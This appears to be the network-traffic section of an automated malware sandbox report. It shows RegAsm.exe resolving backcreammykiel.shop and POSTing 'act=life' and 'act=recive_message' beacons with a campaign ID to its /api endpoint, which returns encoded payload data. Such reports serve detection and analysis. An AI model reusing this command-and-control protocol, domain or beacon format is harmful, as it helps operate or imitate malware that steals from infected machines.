            Jun 23, 2024 18:48:56.967505932 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.967664003 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.994180918 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.994195938 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.994533062 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.996470928 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.996504068 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.996630907 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.669300079 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.669344902 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.669428110 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.669440031 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.669531107 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.669558048 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.669572115 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.669579983 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.669737101 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.669822931 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.670036077 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.670099974 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.670105934 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.670245886 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.670315027 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.670320988 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.674386978 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.674484015 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.674489975 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.724282980 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.757682085 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.758400917 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.758433104 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.758454084 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.758469105 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.758523941 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.758528948 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.758599997 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.758734941 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.758758068 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.758769035 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.758774996 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.791977882 CEST49709443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.792013884 CEST44349709104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:57.792093992 CEST49709443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.792494059 CEST49709443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:57.792505980 CEST44349709104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:58.251637936 CEST44349709104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:58.251708984 CEST49709443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:58.252680063 CEST49709443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:58.252686024 CEST44349709104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:58.252882957 CEST44349709104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:58.261334896 CEST49709443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:58.261460066 CEST49709443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:58.261480093 CEST44349709104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:58.668775082 CEST44349709104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:58.668854952 CEST44349709104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:58.669028044 CEST49709443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:58.669186115 CEST49709443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:58.694732904 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:58.694787025 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:58.694910049 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:58.695216894 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:58.695235968 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.177886009 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.177952051 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.178991079 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.179028988 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.179260015 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.180406094 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.180552959 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.180599928 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.180677891 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.180694103 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.884301901 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.884387970 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.884435892 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.884615898 CEST49713443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.884639978 CEST44349713104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.964586973 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.964663982 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:59.964766979 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.965065956 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:59.965111017 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:00.443603039 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:00.443698883 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:00.444713116 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:00.444736004 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:00.445053101 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:00.452241898 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:00.452369928 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:00.452409983 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:00.452496052 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:00.452512980 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:01.276782990 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:01.276878119 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:01.276967049 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:01.277235985 CEST49715443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:01.277276993 CEST44349715104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:01.362164974 CEST49716443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:01.362245083 CEST44349716104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:01.362329006 CEST49716443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:01.362612963 CEST49716443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:01.362648964 CEST44349716104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:01.825382948 CEST44349716104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:01.825494051 CEST49716443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:01.826786995 CEST49716443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:01.826808929 CEST44349716104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:01.827055931 CEST44349716104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:01.828366041 CEST49716443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:01.828497887 CEST49716443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:01.828541040 CEST44349716104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:02.479348898 CEST44349716104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:02.479450941 CEST44349716104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:02.479511976 CEST49716443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:02.479581118 CEST49716443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:02.479603052 CEST44349716104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:02.494672060 CEST49717443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:02.494767904 CEST44349717104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:02.494883060 CEST49717443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:02.495122910 CEST49717443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:02.495157957 CEST44349717104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:02.951198101 CEST44349717104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:02.951297045 CEST49717443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:02.952586889 CEST49717443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:02.952610970 CEST44349717104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:02.952853918 CEST44349717104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:02.954005957 CEST49717443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:02.954113007 CEST49717443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:02.954128981 CEST44349717104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:03.347866058 CEST44349717104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:03.347966909 CEST44349717104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:03.348059893 CEST49717443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:03.348242998 CEST49717443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:03.348288059 CEST44349717104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:03.804414988 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:03.804553032 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:03.804650068 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:03.805124998 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:03.805164099 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.270253897 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.270546913 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.271665096 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.271687031 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.271919966 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.273073912 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.273752928 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.273796082 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.273895979 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.273935080 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.274059057 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.274104118 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.274266005 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.274316072 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.274494886 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.274543047 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.274760962 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.274801016 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.274826050 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.274847031 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.274981022 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.275016069 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.275054932 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.275151014 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.275194883 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.283998966 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.284215927 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.284259081 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:04.284303904 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.284382105 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:04.285725117 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:06.533356905 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:06.533437967 CEST44349718104.21.90.18192.168.2.5
            Jun 23, 2024 18:49:06.533504963 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:06.533606052 CEST49718443192.168.2.5104.21.90.18
            Jun 23, 2024 18:49:06.533641100 CEST44349718104.21.90.18192.168.2.5
            TimestampSource PortDest PortSource IPDest IP
            Jun 23, 2024 18:48:55.452292919 CEST6535553192.168.2.51.1.1.1
            Jun 23, 2024 18:48:55.467715025 CEST53653551.1.1.1192.168.2.5
            Jun 23, 2024 18:49:14.843425989 CEST53512411.1.1.1192.168.2.5
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jun 23, 2024 18:48:55.452292919 CEST192.168.2.51.1.1.10x58a7Standard query (0)backcreammykiel.shopA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jun 23, 2024 18:48:55.467715025 CEST1.1.1.1192.168.2.50x58a7No error (0)backcreammykiel.shop104.21.90.18A (IP address)IN (0x0001)false
            Jun 23, 2024 18:48:55.467715025 CEST1.1.1.1192.168.2.50x58a7No error (0)backcreammykiel.shop172.67.151.5A (IP address)IN (0x0001)false
            • backcreammykiel.shop
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.549705104.21.90.184435592C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            TimestampBytes transferredDirectionData
            2024-06-23 16:48:56 UTC267OUTPOST /api HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Content-Length: 8
            Host: backcreammykiel.shop
            2024-06-23 16:48:56 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
            Data Ascii: act=life
            2024-06-23 16:48:56 UTC812INHTTP/1.1 200 OK
            Date: Sun, 23 Jun 2024 16:48:56 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: PHPSESSID=dfjr8vba9nkv02c1gtcpvoj3fn; expires=Thu, 17-Oct-2024 10:35:35 GMT; Max-Age=9999999; path=/
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5tcM4tdOIANjI50uUgbXP%2Ffvs3TZ9gMaV8Du2EKEGgYNbrky0r5tz27x76AZxpQwjHzHtn02RhgFGSor93Qj%2FxbnOKEP%2BMrpABrUfS%2FlFzfTKOllu1%2FS3J8URcfYGiQGJItQpJatw%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8985f7eecc3e6a5e-EWR
            alt-svc: h3=":443"; ma=86400
            2024-06-23 16:48:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
            Data Ascii: 2ok
            2024-06-23 16:48:56 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.549706104.21.90.184435592C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            TimestampBytes transferredDirectionData
            2024-06-23 16:48:56 UTC268OUTPOST /api HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Content-Length: 65
            Host: backcreammykiel.shop
            2024-06-23 16:48:56 UTC65OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 6e 65 76 65 72 6d 6f 72 65 64 69 65 6c 7a 74 26 6a 3d 64 65 66 61 75 6c 74
            Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@nevermoredielzt&j=default
            2024-06-23 16:48:57 UTC806INHTTP/1.1 200 OK
            Date: Sun, 23 Jun 2024 16:48:57 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: PHPSESSID=crvfilmujonl49936ilaojeih6; expires=Thu, 17-Oct-2024 10:35:36 GMT; Max-Age=9999999; path=/
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5AEyIZgokFg4Y84Lz3oioy3J9673qeNXhJXjxEznEbqOeYrkZFFuOLmN5WNglPQqQ3va9qVzbzRAYHyeL8hRxeDxbj4JkRAq0%2FvJ8SIOEveifWuDbBhTZBPCFQ6R4BT0YXIEl%2FNHtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8985f7f49ca5c468-EWR
            alt-svc: h3=":443"; ma=86400
            2024-06-23 16:48:57 UTC563INData Raw: 35 30 65 30 0d 0a 55 31 72 44 7a 58 35 32 63 6e 44 4b 38 44 78 44 47 75 55 53 50 74 38 56 42 6b 67 73 55 47 6e 38 61 7a 31 45 72 71 4f 52 4d 71 73 6f 55 4d 72 76 43 46 52 49 55 50 37 63 4e 6b 6f 34 6c 6e 63 63 35 54 56 79 4f 6c 6b 31 52 66 5a 69 48 79 58 4b 67 61 73 53 7a 54 49 32 73 4b 68 53 66 48 74 53 72 34 67 65 65 54 71 2b 47 44 66 57 62 69 5a 71 53 54 35 4c 78 6b 73 66 49 63 54 42 38 46 37 4a 4d 6a 47 73 76 52 49 56 47 68 79 74 6d 46 6b 67 66 6f 52 2b 55 37 70 77 59 79 6c 47 50 67 43 52 41 31 42 6d 67 6f 4f 7a 56 39 46 78 59 4f 50 76 4d 78 4d 47 45 59 65 52 54 79 67 34 78 57 38 53 31 52 77 50 4d 77 78 79 44 4a 4a 4a 42 32 53 4d 77 76 52 51 78 7a 55 2b 71 4b 55 57 48 68 59 54 72 70 70 4d 4b 6e 79 4e 65 6c 79 37 66 47 6b 69 58 44 77 50 6c 67 56 65 4b
            Data Ascii: 50e0U1rDzX52cnDK8DxDGuUSPt8VBkgsUGn8az1ErqORMqsoUMrvCFRIUP7cNko4lncc5TVyOlk1RfZiHyXKgasSzTI2sKhSfHtSr4geeTq+GDfWbiZqST5LxksfIcTB8F7JMjGsvRIVGhytmFkgfoR+U7pwYylGPgCRA1BmgoOzV9FxYOPvMxMGEYeRTyg4xW8S1RwPMwxyDJJJB2SMwvRQxzU+qKUWHhYTrppMKnyNely7fGkiXDwPlgVeK
            2024-06-23 16:48:57 UTC1369INData Raw: 75 47 72 48 52 41 52 46 71 61 63 57 69 31 2b 69 58 31 54 75 33 31 6b 4c 55 51 36 41 35 38 45 56 43 6e 4d 78 50 35 55 7a 7a 30 35 70 4f 39 53 56 6c 41 56 73 4e 49 47 59 7a 69 70 64 31 2b 76 4e 56 45 70 51 44 77 4d 69 45 6b 64 4f 59 4b 70 6d 44 76 51 63 33 69 6d 6f 31 78 4d 55 6c 4b 6d 6c 31 45 7a 65 5a 56 31 55 71 39 37 59 53 78 44 4d 51 57 65 44 46 67 72 77 73 66 30 55 38 45 31 4f 61 2b 6a 46 68 63 55 45 65 6a 63 48 47 46 2f 6e 7a 41 45 2f 7a 64 56 4b 55 6f 31 47 5a 30 48 48 32 54 54 6a 35 73 37 6f 69 68 36 34 61 67 51 56 45 68 51 36 4a 68 59 4c 48 47 4d 64 31 53 78 5a 57 38 6c 54 54 73 4d 6d 41 4e 63 4c 73 62 48 2f 56 48 4f 4e 44 2b 7a 6f 52 63 5a 45 78 69 75 30 68 42 6a 4f 49 42 6f 48 4f 55 31 4a 41 52 4e 49 78 32 73 43 6b 34 33 6a 49 50 73 48 71 46 61
            Data Ascii: uGrHRARFqacWi1+iX1Tu31kLUQ6A58EVCnMxP5Uzz05pO9SVlAVsNIGYzipd1+vNVEpQDwMiEkdOYKpmDvQc3imo1xMUlKml1EzeZV1Uq97YSxDMQWeDFgrwsf0U8E1Oa+jFhcUEejcHGF/nzAE/zdVKUo1GZ0HH2TTj5s7oih64agQVEhQ6JhYLHGMd1SxZW8lTTsMmANcLsbH/VHOND+zoRcZExiu0hBjOIBoHOU1JARNIx2sCk43jIPsHqFa
            2024-06-23 16:48:57 UTC1369INData Raw: 49 61 46 77 54 6f 30 45 46 76 45 4f 77 62 52 66 38 33 59 79 59 4f 61 6b 6e 65 42 56 59 6d 78 38 76 33 55 4d 34 38 50 61 4b 6f 48 78 6b 58 47 4b 61 56 57 69 31 78 69 6e 5a 63 75 6e 4e 68 4f 45 73 37 42 35 4a 4a 45 57 53 4d 78 75 73 51 6b 58 4e 34 6a 71 67 4b 46 7a 38 52 75 5a 73 65 59 32 66 4a 47 44 66 57 62 69 5a 71 53 54 35 4c 78 6b 73 66 49 63 6e 4a 2b 46 62 42 4d 53 71 6b 6f 52 63 56 47 68 53 70 6e 31 49 6e 65 49 5a 77 57 72 46 33 59 79 31 63 49 41 36 59 47 31 56 6d 67 6f 4f 7a 56 39 46 78 59 4f 50 76 4b 67 51 48 41 37 37 51 61 79 4a 32 69 58 64 4b 2f 54 56 37 5a 43 5a 5a 59 49 64 4c 48 79 48 41 67 61 73 53 69 54 6f 34 72 61 67 55 45 68 51 61 70 35 31 58 4d 33 6d 4c 66 6b 36 36 64 32 30 6b 51 54 34 43 6b 77 35 53 4c 63 62 4d 39 31 66 49 63 58 62 6a 37
            Data Ascii: IaFwTo0EFvEOwbRf83YyYOakneBVYmx8v3UM48PaKoHxkXGKaVWi1xinZcunNhOEs7B5JJEWSMxusQkXN4jqgKFz8RuZseY2fJGDfWbiZqST5LxksfIcnJ+FbBMSqkoRcVGhSpn1IneIZwWrF3Yy1cIA6YG1VmgoOzV9FxYOPvKgQHA77QayJ2iXdK/TV7ZCZZYIdLHyHAgasSiTo4ragUEhQap51XM3mLfk66d20kQT4Ckw5SLcbM91fIcXbj7
            2024-06-23 16:48:57 UTC1369INData Raw: 55 6f 4a 56 51 4c 48 4f 42 65 31 75 36 63 57 6b 69 51 7a 63 49 6e 77 31 56 4e 4d 2f 4b 2b 56 33 44 63 58 62 6a 37 78 73 4d 55 45 72 71 30 6e 6b 74 55 5a 64 72 54 71 73 33 4a 6a 55 41 57 6d 44 31 45 42 31 6d 79 38 32 7a 43 49 74 78 4f 36 36 6d 45 78 77 59 48 61 65 57 55 43 64 2b 69 6e 56 54 74 32 56 73 4a 45 4d 35 42 4a 55 62 58 79 76 49 7a 66 64 59 77 6a 74 34 37 2b 31 63 45 77 68 53 38 4e 41 65 46 48 57 49 63 46 2b 72 4e 79 59 31 41 46 70 67 39 52 41 64 5a 73 76 4e 73 77 69 4c 63 54 53 76 72 78 4d 59 48 42 6d 67 6b 31 49 76 66 34 4a 35 56 4c 56 6c 5a 53 35 47 4d 77 57 52 43 46 73 6a 79 63 58 30 56 4d 38 2b 65 4f 2f 74 58 42 4d 49 55 76 44 51 48 67 35 66 73 6a 4a 39 68 7a 63 6d 4e 51 42 61 59 50 55 51 48 57 62 4c 7a 62 4d 49 69 33 45 30 6f 71 4d 55 47 78
            Data Ascii: UoJVQLHOBe1u6cWkiQzcInw1VNM/K+V3DcXbj7xsMUErq0nktUZdrTqs3JjUAWmD1EB1my82zCItxO66mExwYHaeWUCd+inVTt2VsJEM5BJUbXyvIzfdYwjt47+1cEwhS8NAeFHWIcF+rNyY1AFpg9RAdZsvNswiLcTSvrxMYHBmgk1Ivf4J5VLVlZS5GMwWRCFsjycX0VM8+eO/tXBMIUvDQHg5fsjJ9hzcmNQBaYPUQHWbLzbMIi3E0oqMUGx
            2024-06-23 16:48:57 UTC1369INData Raw: 57 43 64 35 68 48 56 66 75 48 46 6c 4b 6b 49 34 44 4a 59 44 55 53 76 4b 78 66 56 57 69 58 39 36 34 61 67 45 56 45 68 51 36 4b 42 54 4c 33 47 45 64 6c 47 72 58 31 56 71 44 43 31 46 39 6d 49 30 50 34 36 42 39 46 79 4a 61 58 72 68 71 78 63 63 48 42 65 67 6c 31 38 70 63 6f 39 2f 55 36 39 32 61 79 4e 4a 4f 51 61 52 42 31 6f 6f 33 73 62 34 57 38 45 34 4e 71 66 76 55 6c 5a 51 46 62 44 53 42 6d 4d 34 73 58 4e 53 74 6d 5a 72 4b 55 4a 79 53 59 46 48 4e 30 32 6e 32 4c 45 51 7a 6a 31 34 2b 65 31 63 48 68 73 57 71 35 5a 62 4c 6e 6d 47 64 6b 36 36 66 6e 59 6b 51 7a 30 44 6c 67 42 65 49 73 6e 4d 39 56 7a 44 4d 44 2b 76 6f 52 52 55 58 6c 44 6f 6c 55 5a 68 49 4d 55 77 66 61 31 73 64 6a 78 44 45 77 61 52 53 52 30 35 67 71 6d 59 4f 39 42 7a 65 4b 61 6a 58 45 78 53 55 71 47
            Data Ascii: WCd5hHVfuHFlKkI4DJYDUSvKxfVWiX964agEVEhQ6KBTL3GEdlGrX1VqDC1F9mI0P46B9FyJaXrhqxccHBegl18pco9/U692ayNJOQaRB1oo3sb4W8E4NqfvUlZQFbDSBmM4sXNStmZrKUJySYFHN02n2LEQzj14+e1cHhsWq5ZbLnmGdk66fnYkQz0DlgBeIsnM9VzDMD+voRRUXlDolUZhIMUwfa1sdjxDEwaRSR05gqmYO9BzeKajXExSUqG
            2024-06-23 16:48:57 UTC1369INData Raw: 73 64 2b 56 62 78 2f 61 69 5a 47 4e 68 6d 65 41 6c 59 70 7a 63 37 7a 55 38 67 37 4d 4c 4f 70 48 42 38 59 46 61 43 57 55 44 4e 35 69 44 41 53 2f 7a 64 6a 4d 67 35 71 53 64 34 34 53 53 48 4c 7a 72 46 35 7a 69 6f 35 71 36 77 58 47 46 42 51 74 39 77 32 53 68 4f 65 4d 68 79 36 65 79 52 79 44 48 49 47 6b 67 52 62 4e 4d 44 42 38 31 6e 4f 4f 79 71 75 6f 42 45 58 45 42 65 36 6b 30 77 75 63 34 4a 7a 57 4c 4a 34 61 43 4a 45 63 6b 58 63 53 56 67 2b 6a 4a 6d 78 45 4f 55 79 4b 61 76 74 4f 77 34 47 46 61 53 44 56 53 78 30 78 7a 4a 44 38 78 38 50 51 56 64 77 53 35 6b 46 48 33 36 4f 67 66 4e 52 78 43 4d 39 6f 4b 55 57 47 52 67 64 72 5a 64 52 4a 58 79 4d 66 6b 36 7a 65 47 51 73 52 54 4d 4f 6e 51 4a 56 4b 4d 58 54 73 78 36 4c 63 54 2b 35 37 30 52 57 55 44 69 7a 6b 31 4d 74
            Data Ascii: sd+Vbx/aiZGNhmeAlYpzc7zU8g7MLOpHB8YFaCWUDN5iDAS/zdjMg5qSd44SSHLzrF5zio5q6wXGFBQt9w2ShOeMhy6eyRyDHIGkgRbNMDB81nOOyquoBEXEBe6k0wuc4JzWLJ4aCJEckXcSVg+jJmxEOUyKavtOw4GFaSDVSx0xzJD8x8PQVdwS5kFH36OgfNRxCM9oKUWGRgdrZdRJXyMfk6zeGQsRTMOnQJVKMXTsx6LcT+570RWUDizk1Mt
